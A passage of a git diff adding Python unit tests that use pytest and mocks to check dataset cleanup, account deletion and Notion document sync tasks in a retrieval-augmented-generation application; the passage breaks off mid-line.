+ + Scenario: + - doc_form is None, empty, or whitespace-only + - Should use default IndexStructureType.PARAGRAPH_INDEX + + Expected behavior: + - Default index type is used for cleanup + - No errors are raised + - Cleanup proceeds normally + """ + # Arrange - import to verify the default value + from core.rag.index_processor.constant.index_type import IndexStructureType + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form=invalid_doc_form, + ) + + # Assert - IndexProcessorFactory should be called with default type + mock_index_processor_factory["factory"].assert_called_once_with(IndexStructureType.PARAGRAPH_INDEX) + mock_index_processor_factory["processor"].clean.assert_called_once() + + def test_clean_dataset_task_valid_doc_form_used_directly( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that valid doc_form values are used directly. + + Expected behavior: + - Provided doc_form is passed to IndexProcessorFactory + """ + # Arrange + valid_doc_form = "qa_index" + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form=valid_doc_form, + ) + + # Assert + mock_index_processor_factory["factory"].assert_called_once_with(valid_doc_form) + + +# ============================================================================ +# Test Error Handling +# ============================================================================ + + +class TestErrorHandling: + """Test cases for error handling and recovery.""" + + def test_clean_dataset_task_vector_cleanup_failure_continues( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + mock_document, + mock_segment, + ): + """ + Test that document cleanup continues even if vector cleanup fails. + + Scenario: + - IndexProcessor.clean() raises an exception + - Document and segment deletion should still proceed + + Expected behavior: + - Exception is caught and logged + - Documents and segments are still deleted + - Session is committed + """ + # Arrange + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [mock_segment], # segments + ] + mock_index_processor_factory["processor"].clean.side_effect = Exception("Vector database error") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - documents and segments should still be deleted + mock_db_session.session.delete.assert_any_call(mock_document) + mock_db_session.session.delete.assert_any_call(mock_segment) + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_storage_delete_failure_continues( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that cleanup continues even if storage deletion fails. 
+ + Scenario: + - Segment contains image file references + - Storage.delete() raises an exception + - Cleanup should continue + + Expected behavior: + - Exception is caught and logged + - Image file record is still deleted from database + - Other cleanup operations proceed + """ + # Arrange + # Need at least one document for segment processing to occur (code is in else block) + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" # Non-upload type to avoid file deletion + + mock_segment = MagicMock() + mock_segment.id = str(uuid.uuid4()) + mock_segment.content = "Test content with image" + + mock_upload_file = MagicMock() + mock_upload_file.id = str(uuid.uuid4()) + mock_upload_file.key = "images/test-image.jpg" + + image_file_id = mock_upload_file.id + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents - need at least one for segment processing + [mock_segment], # segments + ] + mock_get_image_upload_file_ids.return_value = [image_file_id] + mock_db_session.session.query.return_value.where.return_value.first.return_value = mock_upload_file + mock_storage.delete.side_effect = Exception("Storage service unavailable") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - storage delete was attempted for image file + mock_storage.delete.assert_called_with(mock_upload_file.key) + # Image file should still be deleted from database + mock_db_session.session.delete.assert_any_call(mock_upload_file) + + def test_clean_dataset_task_database_error_rollback( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that database session is rolled back on error. + + Scenario: + - Database operation raises an exception + - Session should be rolled back to prevent dirty state + + Expected behavior: + - Session.rollback() is called + - Session.close() is called in finally block + """ + # Arrange + mock_db_session.session.commit.side_effect = Exception("Database commit failed") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.rollback.assert_called_once() + mock_db_session.session.close.assert_called_once() + + def test_clean_dataset_task_rollback_failure_still_closes_session( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that session is closed even if rollback fails. 
+ + Scenario: + - Database commit fails + - Rollback also fails + - Session should still be closed + + Expected behavior: + - Session.close() is called regardless of rollback failure + """ + # Arrange + mock_db_session.session.commit.side_effect = Exception("Commit failed") + mock_db_session.session.rollback.side_effect = Exception("Rollback failed") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.close.assert_called_once() + + +# ============================================================================ +# Test Pipeline and Workflow Deletion +# ============================================================================ + + +class TestPipelineAndWorkflowDeletion: + """Test cases for pipeline and workflow deletion.""" + + def test_clean_dataset_task_with_pipeline_id( + self, + dataset_id, + tenant_id, + collection_binding_id, + pipeline_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that pipeline and workflow are deleted when pipeline_id is provided. + + Expected behavior: + - Pipeline record is deleted + - Related workflow record is deleted + """ + # Arrange + mock_query = mock_db_session.session.query.return_value + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 1 + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + pipeline_id=pipeline_id, + ) + + # Assert - verify delete was called for pipeline-related queries + # The actual count depends on total queries, but pipeline deletion should add 2 more + assert mock_query.delete.call_count >= 7 # 5 base + 2 pipeline/workflow + + def test_clean_dataset_task_without_pipeline_id( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that pipeline/workflow deletion is skipped when pipeline_id is None. + + Expected behavior: + - Pipeline and workflow deletion queries are not executed + """ + # Arrange + mock_query = mock_db_session.session.query.return_value + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 1 + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + pipeline_id=None, + ) + + # Assert - verify delete was called only for base queries (5 times) + assert mock_query.delete.call_count == 5 + + +# ============================================================================ +# Test Segment Attachment Cleanup +# ============================================================================ + + +class TestSegmentAttachmentCleanup: + """Test cases for segment attachment cleanup.""" + + def test_clean_dataset_task_with_attachments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that segment attachments are cleaned up properly. 
+ + Scenario: + - Dataset has segment attachments with associated files + - Both binding and file records should be deleted + + Expected behavior: + - Storage.delete() is called for each attachment file + - Attachment file records are deleted from database + - Binding records are deleted from database + """ + # Arrange + mock_binding = MagicMock() + mock_binding.attachment_id = str(uuid.uuid4()) + + mock_attachment_file = MagicMock() + mock_attachment_file.id = mock_binding.attachment_id + mock_attachment_file.key = f"attachments/{uuid.uuid4()}.pdf" + + # Setup execute to return attachment with binding + mock_db_session.session.execute.return_value.all.return_value = [(mock_binding, mock_attachment_file)] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_called_with(mock_attachment_file.key) + mock_db_session.session.delete.assert_any_call(mock_attachment_file) + mock_db_session.session.delete.assert_any_call(mock_binding) + + def test_clean_dataset_task_attachment_storage_failure( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that cleanup continues even if attachment storage deletion fails. + + Expected behavior: + - Exception is caught and logged + - Attachment file and binding are still deleted from database + """ + # Arrange + mock_binding = MagicMock() + mock_binding.attachment_id = str(uuid.uuid4()) + + mock_attachment_file = MagicMock() + mock_attachment_file.id = mock_binding.attachment_id + mock_attachment_file.key = f"attachments/{uuid.uuid4()}.pdf" + + mock_db_session.session.execute.return_value.all.return_value = [(mock_binding, mock_attachment_file)] + mock_storage.delete.side_effect = Exception("Storage error") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - storage delete was attempted + mock_storage.delete.assert_called_once() + # Records should still be deleted from database + mock_db_session.session.delete.assert_any_call(mock_attachment_file) + mock_db_session.session.delete.assert_any_call(mock_binding) + + +# ============================================================================ +# Test Upload File Cleanup +# ============================================================================ + + +class TestUploadFileCleanup: + """Test cases for upload file cleanup.""" + + def test_clean_dataset_task_deletes_document_upload_files( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that document upload files are deleted. 
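+
+        Assumed shape of the code path under test (illustrative sketch;
+        UploadFile stands in for whatever model the task actually queries):
+
+            if document.data_source_type == "upload_file":
+                info = document.data_source_info_dict
+                if info and info.get("upload_file_id"):
+                    file = db.session.query(UploadFile).where(...).first()
+                    if file:
+                        storage.delete(file.key)
+                        db.session.delete(file)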
+ + Scenario: + - Document has data_source_type = "upload_file" + - data_source_info contains upload_file_id + + Expected behavior: + - Upload file is deleted from storage + - Upload file record is deleted from database + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "upload_file" + mock_document.data_source_info = '{"upload_file_id": "test-file-id"}' + mock_document.data_source_info_dict = {"upload_file_id": "test-file-id"} + + mock_upload_file = MagicMock() + mock_upload_file.id = "test-file-id" + mock_upload_file.key = "uploads/test-file.txt" + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + mock_db_session.session.query.return_value.where.return_value.first.return_value = mock_upload_file + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_called_with(mock_upload_file.key) + mock_db_session.session.delete.assert_any_call(mock_upload_file) + + def test_clean_dataset_task_handles_missing_upload_file( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that missing upload files are handled gracefully. + + Scenario: + - Document references an upload_file_id that doesn't exist + + Expected behavior: + - No error is raised + - Cleanup continues normally + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "upload_file" + mock_document.data_source_info = '{"upload_file_id": "nonexistent-file"}' + mock_document.data_source_info_dict = {"upload_file_id": "nonexistent-file"} + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + mock_db_session.session.query.return_value.where.return_value.first.return_value = None + + # Act - should not raise exception + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_handles_non_upload_file_data_source( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that non-upload_file data sources are skipped. 
+
+        Scenario:
+        - Document has data_source_type = "website"
+
+        Expected behavior:
+        - No file deletion is attempted
+        """
+        # Arrange
+        mock_document = MagicMock()
+        mock_document.id = str(uuid.uuid4())
+        mock_document.tenant_id = tenant_id
+        mock_document.data_source_type = "website"
+        mock_document.data_source_info = None
+
+        mock_db_session.session.scalars.return_value.all.side_effect = [
+            [mock_document],  # documents
+            [],  # segments
+        ]
+
+        # Act
+        clean_dataset_task(
+            dataset_id=dataset_id,
+            tenant_id=tenant_id,
+            indexing_technique="high_quality",
+            index_struct='{"type": "paragraph"}',
+            collection_binding_id=collection_binding_id,
+            doc_form="paragraph_index",
+        )
+
+        # Assert - storage delete should not be called for document files
+        # (only for image files in segments, which are empty here)
+        mock_storage.delete.assert_not_called()
+
+
+# ============================================================================
+# Test Image File Cleanup
+# ============================================================================
+
+
+class TestImageFileCleanup:
+    """Test cases for image file cleanup in segments."""
+
+    def test_clean_dataset_task_deletes_image_files_in_segments(
+        self,
+        dataset_id,
+        tenant_id,
+        collection_binding_id,
+        mock_db_session,
+        mock_storage,
+        mock_index_processor_factory,
+        mock_get_image_upload_file_ids,
+    ):
+        """
+        Test that image files referenced in segment content are deleted.
+
+        Scenario:
+        - Segment content contains image file references
+        - get_image_upload_file_ids returns file IDs
+
+        Expected behavior:
+        - Each image file is deleted from storage
+        - Each image file record is deleted from database
+        """
+        # Arrange
+        # Need at least one document for segment processing to occur (code is in else block)
+        mock_document = MagicMock()
+        mock_document.id = str(uuid.uuid4())
+        mock_document.tenant_id = tenant_id
+        mock_document.data_source_type = "website"  # Non-upload type
+
+        mock_segment = MagicMock()
+        mock_segment.id = str(uuid.uuid4())
+        # Illustrative markup only; get_image_upload_file_ids is mocked below,
+        # so the exact content format does not affect the test.
+        mock_segment.content = '<img src="image-1"> <img src="image-2">'
+
+        image_file_ids = ["image-1", "image-2"]
+        mock_get_image_upload_file_ids.return_value = image_file_ids
+
+        mock_image_files = []
+        for file_id in image_file_ids:
+            mock_file = MagicMock()
+            mock_file.id = file_id
+            mock_file.key = f"images/{file_id}.jpg"
+            mock_image_files.append(mock_file)
+
+        mock_db_session.session.scalars.return_value.all.side_effect = [
+            [mock_document],  # documents - need at least one for segment processing
+            [mock_segment],  # segments
+        ]
+
+        # Set up a mock query chain that returns the files in sequence
+        mock_query = MagicMock()
+        mock_where = MagicMock()
+        mock_query.where.return_value = mock_where
+        mock_where.first.side_effect = mock_image_files
+        mock_db_session.session.query.return_value = mock_query
+
+        # Act
+        clean_dataset_task(
+            dataset_id=dataset_id,
+            tenant_id=tenant_id,
+            indexing_technique="high_quality",
+            index_struct='{"type": "paragraph"}',
+            collection_binding_id=collection_binding_id,
+            doc_form="paragraph_index",
+        )
+
+        # Assert
+        assert mock_storage.delete.call_count == 2
+        mock_storage.delete.assert_any_call("images/image-1.jpg")
+        mock_storage.delete.assert_any_call("images/image-2.jpg")
+
+    def test_clean_dataset_task_handles_missing_image_file(
+        self,
+        dataset_id,
+        tenant_id,
+        collection_binding_id,
+        mock_db_session,
+        mock_storage,
+        mock_index_processor_factory,
+        mock_get_image_upload_file_ids,
+    ):
+        """
+        Test that missing image files are handled gracefully.
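+
+        The guard being exercised is assumed to be of this form (sketch only):
+
+            for file_id in get_image_upload_file_ids(segment.content):
+                image_file = db.session.query(UploadFile).where(...).first()
+                if image_file is None:
+                    continue  # nothing to delete; keep cleaning
+                storage.delete(image_file.key)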
+
+        Scenario:
+        - Segment references an image file ID that doesn't exist in the database
+
+        Expected behavior:
+        - No error is raised
+        - Cleanup continues
+        """
+        # Arrange
+        # Need at least one document for segment processing to occur (code is in else block)
+        mock_document = MagicMock()
+        mock_document.id = str(uuid.uuid4())
+        mock_document.tenant_id = tenant_id
+        mock_document.data_source_type = "website"  # Non-upload type
+
+        mock_segment = MagicMock()
+        mock_segment.id = str(uuid.uuid4())
+        # Illustrative markup only; the extractor is mocked below.
+        mock_segment.content = '<img src="nonexistent-image">'
+
+        mock_get_image_upload_file_ids.return_value = ["nonexistent-image"]
+
+        mock_db_session.session.scalars.return_value.all.side_effect = [
+            [mock_document],  # documents - need at least one for segment processing
+            [mock_segment],  # segments
+        ]
+
+        # Image file not found
+        mock_db_session.session.query.return_value.where.return_value.first.return_value = None
+
+        # Act - should not raise exception
+        clean_dataset_task(
+            dataset_id=dataset_id,
+            tenant_id=tenant_id,
+            indexing_technique="high_quality",
+            index_struct='{"type": "paragraph"}',
+            collection_binding_id=collection_binding_id,
+            doc_form="paragraph_index",
+        )
+
+        # Assert
+        mock_storage.delete.assert_not_called()
+        mock_db_session.session.commit.assert_called_once()
+
+
+# ============================================================================
+# Test Edge Cases
+# ============================================================================
+
+
+class TestEdgeCases:
+    """Test edge cases and boundary conditions."""
+
+    def test_clean_dataset_task_multiple_documents_and_segments(
+        self,
+        dataset_id,
+        tenant_id,
+        collection_binding_id,
+        mock_db_session,
+        mock_storage,
+        mock_index_processor_factory,
+        mock_get_image_upload_file_ids,
+    ):
+        """
+        Test cleanup of multiple documents and segments.
+
+        Scenario:
+        - Dataset has 5 documents and 10 segments
+
+        Expected behavior:
+        - All documents and segments are deleted
+        """
+        # Arrange
+        mock_documents = []
+        for _ in range(5):
+            doc = MagicMock()
+            doc.id = str(uuid.uuid4())
+            doc.tenant_id = tenant_id
+            doc.data_source_type = "website"  # Non-upload type
+            mock_documents.append(doc)
+
+        mock_segments = []
+        for i in range(10):
+            seg = MagicMock()
+            seg.id = str(uuid.uuid4())
+            seg.content = f"Segment content {i}"
+            mock_segments.append(seg)
+
+        mock_db_session.session.scalars.return_value.all.side_effect = [
+            mock_documents,
+            mock_segments,
+        ]
+        mock_get_image_upload_file_ids.return_value = []
+
+        # Act
+        clean_dataset_task(
+            dataset_id=dataset_id,
+            tenant_id=tenant_id,
+            indexing_technique="high_quality",
+            index_struct='{"type": "paragraph"}',
+            collection_binding_id=collection_binding_id,
+            doc_form="paragraph_index",
+        )
+
+        # Assert - all documents and segments should be deleted
+        delete_calls = mock_db_session.session.delete.call_args_list
+        deleted_items = [call[0][0] for call in delete_calls]
+
+        for doc in mock_documents:
+            assert doc in deleted_items
+        for seg in mock_segments:
+            assert seg in deleted_items
+
+    def test_clean_dataset_task_document_with_empty_data_source_info(
+        self,
+        dataset_id,
+        tenant_id,
+        collection_binding_id,
+        mock_db_session,
+        mock_storage,
+        mock_index_processor_factory,
+        mock_get_image_upload_file_ids,
+    ):
+        """
+        Test handling of document with empty data_source_info.
+ + Scenario: + - Document has data_source_type = "upload_file" + - data_source_info is None or empty + + Expected behavior: + - No error is raised + - File deletion is skipped + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "upload_file" + mock_document.data_source_info = None + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + + # Act - should not raise exception + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_session_always_closed( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that database session is always closed regardless of success or failure. + + Expected behavior: + - Session.close() is called in finally block + """ + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.close.assert_called_once() + + +# ============================================================================ +# Test IndexProcessor Parameters +# ============================================================================ + + +class TestIndexProcessorParameters: + """Test cases for IndexProcessor clean method parameters.""" + + def test_clean_dataset_task_passes_correct_parameters_to_index_processor( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that correct parameters are passed to IndexProcessor.clean(). 
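+
+        The assertions below pin the call down to roughly (hedged sketch):
+
+            index_processor = IndexProcessorFactory(doc_form).init_index_processor()
+            index_processor.clean(dataset, None, with_keywords=True, delete_child_chunks=True)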
+ + Expected behavior: + - with_keywords=True is passed + - delete_child_chunks=True is passed + - Dataset object with correct attributes is passed + """ + # Arrange + indexing_technique = "high_quality" + index_struct = '{"type": "paragraph"}' + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique=indexing_technique, + index_struct=index_struct, + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_index_processor_factory["processor"].clean.assert_called_once() + call_args = mock_index_processor_factory["processor"].clean.call_args + + # Verify positional arguments + dataset_arg = call_args[0][0] + assert dataset_arg.id == dataset_id + assert dataset_arg.tenant_id == tenant_id + assert dataset_arg.indexing_technique == indexing_technique + assert dataset_arg.index_struct == index_struct + assert dataset_arg.collection_binding_id == collection_binding_id + + # Verify None is passed as second argument + assert call_args[0][1] is None + + # Verify keyword arguments + assert call_args[1]["with_keywords"] is True + assert call_args[1]["delete_child_chunks"] is True diff --git a/api/tests/unit_tests/tasks/test_delete_account_task.py b/api/tests/unit_tests/tasks/test_delete_account_task.py new file mode 100644 index 0000000000..3b148e63f2 --- /dev/null +++ b/api/tests/unit_tests/tasks/test_delete_account_task.py @@ -0,0 +1,112 @@ +""" +Unit tests for delete_account_task. + +Covers: +- Billing enabled with existing account: calls billing and sends success email +- Billing disabled with existing account: skips billing, sends success email +- Account not found: still calls billing when enabled, does not send email +- Billing deletion raises: logs and re-raises, no email +""" + +from types import SimpleNamespace +from unittest.mock import MagicMock, patch + +import pytest + +from tasks.delete_account_task import delete_account_task + + +@pytest.fixture +def mock_db_session(): + """Mock the db.session used in delete_account_task.""" + with patch("tasks.delete_account_task.db.session") as mock_session: + mock_query = MagicMock() + mock_session.query.return_value = mock_query + mock_query.where.return_value = mock_query + yield mock_session + + +@pytest.fixture +def mock_deps(): + """Patch external dependencies: BillingService and send_deletion_success_task.""" + with ( + patch("tasks.delete_account_task.BillingService") as mock_billing, + patch("tasks.delete_account_task.send_deletion_success_task") as mock_mail_task, + ): + # ensure .delay exists on the mail task + mock_mail_task.delay = MagicMock() + yield { + "billing": mock_billing, + "mail_task": mock_mail_task, + } + + +def _set_account_found(mock_db_session, email: str = "user@example.com"): + account = SimpleNamespace(email=email) + mock_db_session.query.return_value.where.return_value.first.return_value = account + return account + + +def _set_account_missing(mock_db_session): + mock_db_session.query.return_value.where.return_value.first.return_value = None + + +class TestDeleteAccountTask: + def test_billing_enabled_account_exists_calls_billing_and_sends_email(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-123" + account = _set_account_found(mock_db_session, email="a@b.com") + + # Enable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_called_once_with(account_id) + 
mock_deps["mail_task"].delay.assert_called_once_with(account.email) + + def test_billing_disabled_account_exists_sends_email_only(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-456" + account = _set_account_found(mock_db_session, email="x@y.com") + + # Disable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", False): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_not_called() + mock_deps["mail_task"].delay.assert_called_once_with(account.email) + + def test_account_not_found_billing_enabled_calls_billing_no_email(self, mock_db_session, mock_deps, caplog): + # Arrange + account_id = "missing-id" + _set_account_missing(mock_db_session) + + # Enable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_called_once_with(account_id) + mock_deps["mail_task"].delay.assert_not_called() + # Optional: verify log contains not found message + assert any("not found" in rec.getMessage().lower() for rec in caplog.records) + + def test_billing_delete_raises_propagates_and_no_email(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-err" + _set_account_found(mock_db_session, email="err@ex.com") + mock_deps["billing"].delete_account.side_effect = RuntimeError("billing down") + + # Enable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act & Assert + with pytest.raises(RuntimeError): + delete_account_task(account_id) + + # Ensure email was not sent + mock_deps["mail_task"].delay.assert_not_called() diff --git a/api/tests/unit_tests/tasks/test_document_indexing_sync_task.py b/api/tests/unit_tests/tasks/test_document_indexing_sync_task.py new file mode 100644 index 0000000000..374abe0368 --- /dev/null +++ b/api/tests/unit_tests/tasks/test_document_indexing_sync_task.py @@ -0,0 +1,520 @@ +""" +Unit tests for document indexing sync task. 
+ +This module tests the document indexing sync task functionality including: +- Syncing Notion documents when updated +- Validating document and data source existence +- Credential validation and retrieval +- Cleaning old segments before re-indexing +- Error handling and edge cases +""" + +import uuid +from unittest.mock import MagicMock, Mock, patch + +import pytest + +from core.indexing_runner import DocumentIsPausedError, IndexingRunner +from models.dataset import Dataset, Document, DocumentSegment +from tasks.document_indexing_sync_task import document_indexing_sync_task + +# ============================================================================ +# Fixtures +# ============================================================================ + + +@pytest.fixture +def tenant_id(): + """Generate a unique tenant ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def dataset_id(): + """Generate a unique dataset ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def document_id(): + """Generate a unique document ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def notion_workspace_id(): + """Generate a Notion workspace ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def notion_page_id(): + """Generate a Notion page ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def credential_id(): + """Generate a credential ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def mock_dataset(dataset_id, tenant_id): + """Create a mock Dataset object.""" + dataset = Mock(spec=Dataset) + dataset.id = dataset_id + dataset.tenant_id = tenant_id + dataset.indexing_technique = "high_quality" + dataset.embedding_model_provider = "openai" + dataset.embedding_model = "text-embedding-ada-002" + return dataset + + +@pytest.fixture +def mock_document(document_id, dataset_id, tenant_id, notion_workspace_id, notion_page_id, credential_id): + """Create a mock Document object with Notion data source.""" + doc = Mock(spec=Document) + doc.id = document_id + doc.dataset_id = dataset_id + doc.tenant_id = tenant_id + doc.data_source_type = "notion_import" + doc.indexing_status = "completed" + doc.error = None + doc.stopped_at = None + doc.processing_started_at = None + doc.doc_form = "text_model" + doc.data_source_info_dict = { + "notion_workspace_id": notion_workspace_id, + "notion_page_id": notion_page_id, + "type": "page", + "last_edited_time": "2024-01-01T00:00:00Z", + "credential_id": credential_id, + } + return doc + + +@pytest.fixture +def mock_document_segments(document_id): + """Create mock DocumentSegment objects.""" + segments = [] + for i in range(3): + segment = Mock(spec=DocumentSegment) + segment.id = str(uuid.uuid4()) + segment.document_id = document_id + segment.index_node_id = f"node-{document_id}-{i}" + segments.append(segment) + return segments + + +@pytest.fixture +def mock_db_session(): + """Mock database session.""" + with patch("tasks.document_indexing_sync_task.db.session") as mock_session: + mock_query = MagicMock() + mock_session.query.return_value = mock_query + mock_query.where.return_value = mock_query + mock_session.scalars.return_value = MagicMock() + yield mock_session + + +@pytest.fixture +def mock_datasource_provider_service(): + """Mock DatasourceProviderService.""" + with patch("tasks.document_indexing_sync_task.DatasourceProviderService") as mock_service_class: + mock_service = MagicMock() + mock_service.get_datasource_credentials.return_value = {"integration_secret": "test_token"} 
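+        # The class itself is patched, so any DatasourceProviderService()
+        # constructed inside the task receives this MagicMock; the
+        # "integration_secret" key mirrors what the task is assumed to read.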
+ mock_service_class.return_value = mock_service + yield mock_service + + +@pytest.fixture +def mock_notion_extractor(): + """Mock NotionExtractor.""" + with patch("tasks.document_indexing_sync_task.NotionExtractor") as mock_extractor_class: + mock_extractor = MagicMock() + mock_extractor.get_notion_last_edited_time.return_value = "2024-01-02T00:00:00Z" # Updated time + mock_extractor_class.return_value = mock_extractor + yield mock_extractor + + +@pytest.fixture +def mock_index_processor_factory(): + """Mock IndexProcessorFactory.""" + with patch("tasks.document_indexing_sync_task.IndexProcessorFactory") as mock_factory: + mock_processor = MagicMock() + mock_processor.clean = Mock() + mock_factory.return_value.init_index_processor.return_value = mock_processor + yield mock_factory + + +@pytest.fixture +def mock_indexing_runner(): + """Mock IndexingRunner.""" + with patch("tasks.document_indexing_sync_task.IndexingRunner") as mock_runner_class: + mock_runner = MagicMock(spec=IndexingRunner) + mock_runner.run = Mock() + mock_runner_class.return_value = mock_runner + yield mock_runner + + +# ============================================================================ +# Tests for document_indexing_sync_task +# ============================================================================ + + +class TestDocumentIndexingSyncTask: + """Tests for the document_indexing_sync_task function.""" + + def test_document_not_found(self, mock_db_session, dataset_id, document_id): + """Test that task handles document not found gracefully.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.return_value = None + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + mock_db_session.close.assert_called_once() + + def test_missing_notion_workspace_id(self, mock_db_session, mock_document, 